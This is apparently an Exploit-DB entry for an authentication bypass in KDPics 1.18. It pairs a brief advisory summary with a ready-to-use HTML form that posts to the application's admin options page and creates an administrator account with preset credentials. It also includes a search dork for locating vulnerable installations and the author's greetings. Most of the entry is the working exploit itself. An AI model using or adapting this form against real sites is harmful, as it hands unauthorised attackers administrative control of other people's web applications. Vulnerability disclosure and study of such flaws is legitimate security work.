KDPics 1.18 - '/admin/index.php' Authentication Bypass

EDB-ID:

33723

CVE:

N/A


Author:

snakespc

Type:

webapps


Platform:

PHP

Date:

2010-03-08


source: https://www.securityfocus.com/bid/38603/info

KDPics is prone to a vulnerability that lets an attacker add an administrative user because it fails to adequately secure access to administrative functionality.

This may allow the attacker to compromise the application and the computer; other attacks are also possible.

KDPics 1.18 is vulnerable; other versions may also be affected. 


<html>
<title>G�n�r� par KDPics v1.18 Remote Add Admin</title>
 
<body link="#00FF00" text="#008000" bgcolor="#000000">
 
<form method="POST" action="http://www.example.com/kdpics/admin/index.php3?page=options&categorie=">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
<tr>
<td class="top">
<p align="center"><b>User & Pass :Snakespc</b></p>
<p align="center"><b><font face="Comic Sans MS">
<a href="http://www.example.com//index.php?act=idx" style="text-decoration: none">
<font color="#00FF00">[�]Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]</p>
[�] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]</p>[�] Dork:"G�n�r� par KDPics v1.18"</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input type="text" name="adminuser" size="30" value="Snakespc"></td>
</tr>
<tr>
<td class="top">
<p align="center"><b>Password:</b></td>
</tr>
<tr>
 
<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="Snakespc"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
</tr>
</form>
</table>
</html>